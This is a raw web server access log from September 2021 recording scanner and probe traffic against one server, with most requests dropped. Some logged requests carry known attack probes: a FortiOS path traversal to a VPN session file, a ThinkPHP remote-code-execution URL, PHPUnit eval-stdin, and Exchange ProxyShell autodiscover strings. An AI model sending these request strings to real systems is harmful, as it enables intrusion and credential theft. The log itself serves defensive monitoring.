Safari/537.36" "-" [13/Sep/2021:11:15:34 +0000] 444 - POST https 64.22.31.253 "/api/jsonws/invoke" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [13/Sep/2021:11:15:35 +0000] 444 - GET https 64.22.31.253 "/wp-content/plugins/wp-file-manager/readme.txt" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [13/Sep/2021:11:15:35 +0000] 444 - POST https 64.22.31.253 "/mifs/.;/services/LogService" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "https://64.22.31.253:443" [13/Sep/2021:11:15:36 +0000] 444 - GET https 64.22.31.253 "/console/" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [13/Sep/2021:11:15:37 +0000] 444 - POST https 64.22.31.253 "/Autodiscover/Autodiscover.xml" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [13/Sep/2021:11:15:37 +0000] 444 - GET https 64.22.31.253 "/_ignition/execute-solution" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [13/Sep/2021:11:15:38 +0000] 444 - GET https 64.22.31.253 "/" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [13/Sep/2021:11:15:38 +0000] 444 - GET https 64.22.31.253 "/" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [13/Sep/2021:12:18:58 +0000] 444 - GET https 64.22.31.253 "/owa/auth/logon.aspx?url=https%3a%2f%2f1%2fecp%2f" [Client 192.241.220.18] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [13/Sep/2021:15:21:53 +0000] 400 - GET http 64.22.31.253 "/" [Client 45.83.67.223] [Length 252] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:65.0) Gecko/20100101 Firefox/65.0" "-" [13/Sep/2021:15:23:45 +0000] 444 - GET https 64.22.31.253 "/" [Client 162.142.125.57] [Length 0] [Gzip -] "-" "-" [13/Sep/2021:15:23:46 +0000] 400 - GET http 64.22.31.253 "/" [Client 162.142.125.57] [Length 252] [Gzip -] "-" "-" [13/Sep/2021:15:23:46 +0000] 400 - GET http 64.22.31.253 "/" [Client 162.142.125.57] [Length 252] [Gzip -] "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" "-" [13/Sep/2021:15:34:53 +0000] 400 - - http localhost "-" [Client 212.102.35.152] [Length 154] [Gzip -] "-" "-" [13/Sep/2021:17:01:58 +0000] 444 - GET https 192.168.1.12 "/" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [13/Sep/2021:17:01:58 +0000] 444 - GET https 192.168.1.12 "/" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [13/Sep/2021:17:01:58 +0000] 444 - GET https 192.168.1.12 "/ui/" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [13/Sep/2021:17:01:58 +0000] 444 - GET https 192.168.1.12 "/ui/" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [13/Sep/2021:17:01:58 +0000] 444 - GET https 192.168.1.12 "/favicon.ico" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [13/Sep/2021:17:01:58 +0000] 444 - GET https 192.168.1.12 "/favicon.ico" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [13/Sep/2021:17:09:50 +0000] 444 - GET https 64.22.31.253 "/" [Client 183.136.225.14] [Length 0] [Gzip -] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:47.0) Gecko/20100101 Firefox/47.0" "-" [13/Sep/2021:17:26:37 +0000] 444 - GET https 64.22.31.253 "///remote/fgt_lang?lang=/../../../..//////////dev/" [Client 91.132.58.33] [Length 0] [Gzip -] "python-requests/2.6.0 CPython/2.7.5 Linux/3.10.0-1160.36.2.el7.x86_64" "-" [13/Sep/2021:17:48:34 +0000] 400 - GET http localhost "/" [Client 157.245.150.40] [Length 252] [Gzip -] "-" "-" [13/Sep/2021:20:35:17 +0000] 444 - GET https 64.22.31.253 "/" [Client 192.35.168.16] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [13/Sep/2021:21:22:14 +0000] 400 - - http localhost "-" [Client 45.146.166.205] [Length 154] [Gzip -] "-" "-" [13/Sep/2021:21:32:59 +0000] 444 - GET https speedtest.moralanimal.net "/" [Client 144.86.173.146] [Length 0] [Gzip -] "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com" "-" [13/Sep/2021:23:38:02 +0000] 444 - GET https 64.22.31.253 "/ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application" [Client 192.241.207.113] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [14/Sep/2021:00:01:27 +0000] 444 - GET https 64.22.31.253 "/owa/auth/x.js" [Client 192.241.207.42] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [14/Sep/2021:00:01:58 +0000] 444 - GET https 64.22.31.253 "/ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application" [Client 192.241.221.192] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [14/Sep/2021:00:03:04 +0000] 444 - GET https 64.22.31.253 "/owa/auth/logon.aspx" [Client 192.241.221.231] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [14/Sep/2021:00:16:13 +0000] 444 - GET https 64.22.31.253 "/" [Client 184.105.247.254] [Length 0] [Gzip -] "-" "-" [14/Sep/2021:00:18:11 +0000] 444 - GET https 64.22.31.253 "//a2billing/customer/templates/default/footer.tpl" [Client 193.107.216.145] [Length 0] [Gzip -] "python-requests/2.6.0 CPython/2.7.5 Linux/3.10.0-1160.41.1.el7.x86_64" "-" [14/Sep/2021:00:18:24 +0000] 400 - POST http localhost "/spywall/timeConfig.php" [Client 208.138.25.30] [Length 154] [Gzip -] "XTC" "-" [14/Sep/2021:02:07:26 +0000] 444 - GET https 64.22.31.253 "/" [Client 23.90.160.122] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [14/Sep/2021:02:45:16 +0000] 444 - GET https 64.22.31.253 "/actuator/health" [Client 192.241.211.225] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [14/Sep/2021:05:46:36 +0000] 444 - GET https localhost "/favicon.ico" [Client 109.248.6.52] [Length 0] [Gzip -] "masscan-ng/1.3 (https://github.com/bi-zone/masscan-ng)" "-" [14/Sep/2021:06:04:29 +0000] 444 - GET https whoami.moralanimal.net "/" [Client 92.118.160.13] [Length 0] [Gzip -] "NetSystemsResearch studies the availability of various services across the internet. Our website is netsystemsresearch.com" "-" [14/Sep/2021:06:20:07 +0000] 444 - GET https 64.22.31.253 "/" [Client 183.136.225.14] [Length 0] [Gzip -] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:47.0) Gecko/20100101 Firefox/47.0" "-" [14/Sep/2021:06:22:08 +0000] 444 - POST https 64.22.31.253 "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [14/Sep/2021:06:22:08 +0000] 444 - POST https 64.22.31.253 "/api/jsonws/invoke" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [14/Sep/2021:06:22:10 +0000] 444 - GET https 64.22.31.253 "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [14/Sep/2021:06:22:12 +0000] 444 - GET https 64.22.31.253 "/index.php?s=/Index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [14/Sep/2021:06:22:12 +0000] 444 - GET https 64.22.31.253 "/wp-content/plugins/wp-file-manager/readme.txt" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [14/Sep/2021:06:22:15 +0000] 444 - GET https 64.22.31.253 "/console/" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [14/Sep/2021:06:22:15 +0000] 444 - GET https 64.22.31.253 "/?XDEBUG_SESSION_START=phpstorm" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [14/Sep/2021:06:22:16 +0000] 444 - POST https 64.22.31.253 "/mifs/.;/services/LogService" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "https://64.22.31.253:443" [14/Sep/2021:06:22:18 +0000] 444 - POST https 64.22.31.253 "/Autodiscover/Autodiscover.xml" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [14/Sep/2021:06:22:18 +0000] 444 - GET https 64.22.31.253 "/" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [14/Sep/2021:06:22:21 +0000] 444 - GET https 64.22.31.253 "/_ignition/execute-solution" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [14/Sep/2021:06:22:24 +0000] 444 - GET https 64.22.31.253 "/" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [14/Sep/2021:06:45:04 +0000] 444 - GET https 64.22.31.253 "/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession" [Client 195.123.233.4] [Length 0] [Gzip -] "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "-" [14/Sep/2021:06:58:55 +0000] 444 - GET https 64.22.31.253 "/" [Client 71.6.232.7] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.131 Safari/537.36" "-" [14/Sep/2021:07:01:23 +0000] 444 - GET https 64.22.31.253 "/" [Client 89.163.252.30] [Length 0] [Gzip -] "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)" "-" [14/Sep/2021:07:01:38 +0000] 444 - GET https localhost "/nice%20ports%2C/Tri%6Eity.txt%2ebak" [Client 199.195.251.84] [Length 0] [Gzip -] "-" "-" [14/Sep/2021:07:01:41 +0000] 400 - - https localhost "-" [Client 109.70.100.24] [Length 154] [Gzip -] "-" "-" [14/Sep/2021:07:01:42 +0000] 444 - OPTIONS https localhost "/" [Client 109.70.100.24] [Length 0] [Gzip -] "-" "-" [14/Sep/2021:07:01:48 +0000] 400 - - https localhost "-" [Client 89.44.9.43] [Length 154] [Gzip -] "-" "-" [14/Sep/2021:07:12:09 +0000] 444 - GET https 64.22.31.253 "/" [Client 192.241.213.189] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [14/Sep/2021:08:39:53 +0000] 400 - GET http 64.22.31.253 "/" [Client 139.186.143.75] [Length 252] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [14/Sep/2021:11:47:22 +0000] 444 - GET https 64.22.31.253 "/" [Client 138.68.174.48] [Length 0] [Gzip -] "Mozilla/5.0 (Linux; Android; 4.1.2; GT-I9100 Build/000000) AppleWebKit/537.22 (KHTML, like Gecko) Chrome/25.0.1234.12 Mobile Safari/537.22 OPR/14.0.123.123" "-" [14/Sep/2021:12:13:16 +0000] 444 - GET https lndshark.moralanimal.net "/" [Client 34.86.35.23] [Length 0] [Gzip -] "Expanse indexes the network perimeters of our customers. If you have any questions or concerns, please reach out to: scaninfo@expanseinc.com" "-" [14/Sep/2021:12:20:53 +0000] 444 - GET https 64.22.31.253 "/owa/auth/logon.aspx?url=https%3a%2f%2f1%2fecp%2f" [Client 192.241.218.100] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [14/Sep/2021:14:34:47 +0000] 400 - GET https localhost "/" [Client 167.99.133.28] [Length 154] [Gzip -] "-" "-" [14/Sep/2021:14:34:54 +0000] 444 - GET https 64.22.31.253 "/" [Client 167.99.133.28] [Length 0] [Gzip -] "l9tcpid/v1.1.0" "-" [14/Sep/2021:15:24:09 +0000] 444 - GET https 64.22.31.253 "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [14/Sep/2021:15:24:09 +0000] 444 - GET https 64.22.31.253 "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [14/Sep/2021:16:32:52 +0000] 444 - GET https 64.22.31.253 "/" [Client 164.52.24.162] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:79.0) Gecko/20100101 Firefox/79.0" "-" [14/Sep/2021:16:32:53 +0000] 400 - - https localhost "-" [Client 164.52.24.162] [Length 154] [Gzip -] "-" "-" [14/Sep/2021:16:53:01 +0000] 444 - GET https 64.22.31.253 "/" [Client 163.172.148.199] [Length 0] [Gzip -] "-" "-" [14/Sep/2021:16:53:02 +0000] 444 - GET https 64.22.31.253 "/" [Client 163.172.148.199] [Length 0] [Gzip -] "-" "-" [14/Sep/2021:17:02:00 +0000] 444 - GET https 192.168.1.12 "/" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [14/Sep/2021:17:02:00 +0000] 444 - GET https 192.168.1.12 "/" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [14/Sep/2021:17:02:00 +0000] 444 - GET https 192.168.1.12 "/ui/" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [14/Sep/2021:17:02:00 +0000] 444 - GET https 192.168.1.12 "/ui/" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [14/Sep/2021:17:02:00 +0000] 444 - GET https 192.168.1.12 "/favicon.ico" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [14/Sep/2021:17:02:00 +0000] 444 - GET https 192.168.1.12 "/favicon.ico" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [14/Sep/2021:17:35:04 +0000] 400 - - http localhost "-" [Client 91.220.163.141] [Length 154] [Gzip -] "-" "-" [14/Sep/2021:18:19:24 +0000] 444 - GET https 64.22.31.253 "/" [Client 74.120.14.57] [Length 0] [Gzip -] "-" "-" [14/Sep/2021:18:19:25 +0000] 400 - GET http 64.22.31.253 "/" [Client 74.120.14.57] [Length 252] [Gzip -] "-" "-" [14/Sep/2021:18:19:25 +0000] 400 - GET http 64.22.31.253 "/" [Client 74.120.14.57] [Length 252] [Gzip -] "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" "-" [14/Sep/2021:18:50:47 +0000] 400 - - http localhost "-" [Client 91.220.163.141] [Length 154] [Gzip -] "-" "-" [14/Sep/2021:19:43:46 +0000] 400 - GET http 64.22.31.253 "/" [Client 8.131.229.159] [Length 252] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [14/Sep/2021:20:06:40 +0000] 400 - GET http 64.22.31.253 "/config/getuser?index=0" [Client 107.189.31.252] [Length 252] [Gzip -] "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0" "-" [14/Sep/2021:22:39:46 +0000] 444 - GET https 64.22.31.253 "/ReportServer" [Client 192.241.217.64] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [14/Sep/2021:22:45:55 +0000] 444 - GET https 64.22.31.253 "/" [Client 92.118.161.45] [Length 0] [Gzip -] "NetSystemsResearch studies the availability of various services across the internet. Our website is netsystemsresearch.com" "-" [14/Sep/2021:22:57:56 +0000] 444 - GET https 64.22.31.253 "/login" [Client 192.241.221.223] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [14/Sep/2021:23:37:36 +0000] 444 - GET https 64.22.31.253 "/ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application" [Client 192.241.215.94] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [15/Sep/2021:00:03:43 +0000] 444 - GET https 64.22.31.253 "/ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application" [Client 192.241.221.230] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [15/Sep/2021:00:05:37 +0000] 444 - GET https 64.22.31.253 "/owa/auth/logon.aspx" [Client 192.241.214.15] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [15/Sep/2021:00:07:05 +0000] 444 - GET https 64.22.31.253 "/owa/auth/x.js" [Client 198.199.101.75] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [15/Sep/2021:00:49:47 +0000] 444 - GET https 64.22.31.253 "/autodiscover/autodiscover.json?@test.com/owa/?&Email=autodiscover/autodiscover.json%3F@test.com" [Client 5.188.87.4] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36" "-" [15/Sep/2021:00:49:48 +0000] 444 - GET https 64.22.31.253 "/autodiscover/autodiscover.json?@test.com/owa/?&Email=autodiscover/autodiscover.json%3F@test.com" [Client 5.188.87.4] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36" "-" [15/Sep/2021:00:49:49 +0000] 444 - GET https 64.22.31.253 "/autodiscover/autodiscover.json?@test.com/mapi/nspi/?&Email=autodiscover/autodiscover.json%3F@test.com" [Client 5.188.87.4] [Length 0] [Gzip -] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36" "-" [15/Sep/2021:00:49:50 +0000] 444 - GET https 64.22.31.253 "/autodiscover/autodiscover.json?@test.com/mapi/nspi/?&Email=autodiscover/autodiscover.json%3F@test.com" [Client 5.188.87.4] [Length 0] [Gzip -] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36" "-" [15/Sep/2021:01:01:59 +0000] 400 - - http localhost "-" [Client 66.240.205.34] [Length 154] [Gzip -] "-" "-" [15/Sep/2021:01:37:27 +0000] 444 - POST https docs.moralanimal.net "/pages/createpage-entervariables.action?SpaceKey=x" [Client 131.161.83.246] [Length 0] [Gzip -] "Mozilla/5.0 (X11; Gentoo; rv:82.1) Gecko/20100101 Firefox/82.1" "-" [15/Sep/2021:02:24:37 +0000] 444 - GET https 64.22.31.253 "/" [Client 128.14.209.162] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [15/Sep/2021:03:11:31 +0000] 444 - GET https 64.22.31.253 "/" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [15/Sep/2021:03:11:32 +0000] 444 - POST https 64.22.31.253 "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [15/Sep/2021:03:11:32 +0000] 444 - GET https 64.22.31.253 "/" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [15/Sep/2021:03:11:33 +0000] 444 - POST https 64.22.31.253 "/api/jsonws/invoke" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [15/Sep/2021:03:11:37 +0000] 444 - GET https 64.22.31.253 "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [15/Sep/2021:03:11:37 +0000] 444 - GET https 64.22.31.253 "/?XDEBUG_SESSION_START=phpstorm" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [15/Sep/2021:03:11:40 +0000] 444 - POST https 64.22.31.253 "/Autodiscover/Autodiscover.xml" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [15/Sep/2021:03:11:40 +0000] 444 - GET https 64.22.31.253 "/console/" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [15/Sep/2021:03:11:42 +0000] 444 - POST https 64.22.31.253 "/mifs/.;/services/LogService" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "https://64.22.31.253:443" [15/Sep/2021:03:11:43 +0000] 444 - GET https 64.22.31.253 "/_ignition/execute-solution" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [15/Sep/2021:03:11:44 +0000] 444 - GET https 64.22.31.253 "/wp-content/plugins/wp-file-manager/readme.txt" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [15/Sep/2021:03:11:44 +0000] 444 - GET https 64.22.31.253 "/index.php?s=/Index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [15/Sep/2021:03:18:39 +0000] 444 - GET https 64.22.31.253 "/actuator/health" [Client 192.241.213.55] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [15/Sep/2021:04:31:11 +0000] 444 - GET https smtp.moralanimal.net "/" [Client 34.86.35.1] [Length 0] [Gzip -] "Expanse indexes the network perimeters of our customers. If you have any questions or concerns, please reach out to: scaninfo@expanseinc.com" "-" [15/Sep/2021:05:34:35 +0000] 444 - GET https 64.22.31.253 "/" [Client 193.106.29.210] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:90.0) Gecko/20100101 Firefox/90.0" "-" [15/Sep/2021:07:11:22 +0000] 400 - GET http localhost "/" [Client 115.231.83.75] [Length 154] [Gzip -] "-" "-" [15/Sep/2021:07:15:07 +0000] 444 - GET https 64.22.31.253 "/" [Client 192.241.221.236] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [15/Sep/2021:08:06:47 +0000] 444 - GET https whoami.moralanimal.net "/" [Client 34.86.35.23] [Length 0] [Gzip -] "Expanse indexes the network perimeters of our customers. If you have any questions or concerns, please reach out to: scaninfo@expanseinc.com" "-" [15/Sep/2021:09:34:44 +0000] 444 - POST https 64.22.31.253 "/pages/createpage-entervariables.action?SpaceKey=x" [Client 138.68.161.204] [Length 0] [Gzip -] "python-requests/2.18.4" "-" [15/Sep/2021:10:08:14 +0000] 444 - GET https 64.22.31.253 "/" [Client 45.155.204.251] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36" "-" [15/Sep/2021:10:21:04 +0000] 400 - - http localhost "-" [Client 195.54.161.31] [Length 154] [Gzip -] "-" "-" [15/Sep/2021:10:40:45 +0000] 444 - GET https 64.22.31.253 "/" [Client 128.1.248.26] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [15/Sep/2021:11:27:37 +0000] 400 - GET http 64.22.31.253 "/config/getuser?index=0" [Client 209.141.62.185] [Length 252] [Gzip -] "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0" "-" [15/Sep/2021:12:28:42 +0000] 400 - - http localhost "-" [Client 195.54.161.31] [Length 154] [Gzip -] "-" "-" [15/Sep/2021:13:56:03 +0000] 444 - OPTIONS https 64.22.31.253 "/" [Client 104.198.45.160] [Length 0] [Gzip -] "-" "-" [15/Sep/2021:14:30:43 +0000] 444 - GET https 64.22.31.253 "/owa/" [Client 128.14.209.170] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [15/Sep/2021:14:36:28 +0000] 444 - GET https 64.22.31.253 "/" [Client 23.251.102.74] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" 